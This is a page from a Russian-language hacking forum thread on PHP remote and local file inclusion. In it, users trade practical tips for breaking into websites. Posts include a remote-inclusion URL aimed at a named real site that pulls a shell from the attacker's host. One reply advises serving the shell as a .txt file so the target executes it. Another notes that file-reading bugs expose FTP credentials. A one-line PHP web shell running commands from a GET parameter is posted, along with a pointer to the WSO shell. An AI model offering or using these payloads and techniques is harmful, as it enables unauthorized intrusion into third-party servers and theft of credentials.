ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, сейчас доступен на antichat.xyz.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 12.11.2008, 15:06
den1skA
Познающий
Регистрация: 20.05.2008
Сообщений: 78
Провел на форуме:
555326

Репутация: 47
Отправить сообщение для den1skA с помощью ICQ
По умолчанию

Цитата:
Сообщение от Solide Snake  
https://forum.antichat.ru/thread43966.html - SQL injection полный FAQ
https://forum.antichat.ru/thread35207.html - Новая альтернатива Benchmark'y или эффективный blind SQL-injection
ммм... спасибо
 
Ответить с цитированием

  #52  
Старый 20.02.2009, 23:13
S[N]EP
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539

Репутация: 53
По умолчанию

А что делать если стоит фильтрация на \ : . - вообщем на "плохие" символы?
 
Ответить с цитированием

Plizzz help
  #53  
Старый 13.10.2009, 10:58
N@b$ter
Новичок
Регистрация: 06.10.2009
Сообщений: 3
Провел на форуме:
76901

Репутация: 0
Отправить сообщение для N@b$ter с помощью ICQ
Question Plizzz help

Такая фигня, http://www.prodisney.ru/index.php?page=http://nabstre.tu2.ru/shell.php но показывает дерикторию моего сайта а не этого что делать???
 
Ответить с цитированием

  #54  
Старый 16.10.2009, 10:22
Rezak
Новичок
Регистрация: 25.01.2008
Сообщений: 5
Провел на форуме:
9419

Репутация: 2
По умолчанию

Во первых скрипт на твоем сайте должен быть не исполняемым, то есть txt файл к примеру.
Либо вообще без расширения, то есть так:

index.php?page=http://nabstre.tu2.ru/shell.txt?

Потому что если файл исполняемый, то он исполнятся будет на твоем сервере, а на выходе будет уже результат. Поэтому выводится содержание директории на твоем сервере.


Во вторых конкретно на этом сайте бага не работает, скрипт не инклюдит файлы, а выводит их содержание.
Так что облом.

Последний раз редактировалось Rezak; 16.10.2009 в 10:27..
 
Ответить с цитированием

  #55  
Старый 06.11.2009, 21:49
SLITES
Новичок
Регистрация: 27.07.2009
Сообщений: 5
Провел на форуме:
11873

Репутация: 0
По умолчанию

а такой вопросик почему часто бывает то что шел не запускается а просто отображается код шелла.
 
Ответить с цитированием

  #56  
Старый 06.11.2009, 21:56
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

потому что риадер, а не LFI, нет инклуда, есть читалка

PS: Но тоже очень неплохо, т.к. можно прочитать важную системную информацию, например фтп-логин/пасс, что будет покруче любого шелла
 
Ответить с цитированием

  #57  
Старый 06.11.2009, 21:57
shellz[21h]
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122

Репутация: 118
Отправить сообщение для shellz[21h] с помощью ICQ
По умолчанию

Бага в функциях fopen(), file(), file_get_contents() и подобных функциях, которые не способны интерпретировать код.
 
Ответить с цитированием

  #58  
Старый 11.11.2009, 00:21
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

а можете дать адрес рабочего шелла? а то та, которая в статье - уже дохлый.
(или код, чтоб запись на свой хост)
 
Ответить с цитированием

  #59  
Старый 11.11.2009, 00:49
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

Цитата:
(или код, чтоб запись на свой хост)
<?php system($_GET[cmd]); ?>

Если нужен продвинутый шелл - топай топай в раздел "Избраное" и качай WSO
 
Ответить с цитированием

  #60  
Старый 11.11.2009, 01:10
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

Спасибо, нашел и скачал.
а не подскажете как его настроить? просто все это залить в сервер и "вызывать" по адресу: www.mysite.ru/wso2.php ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Использование бага PHP source injection k00p3r Чужие Статьи 0 13.06.2005 14:16
PHP Injection :: Возможно все! k00p3r Чужие Статьи 0 13.06.2005 14:10
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ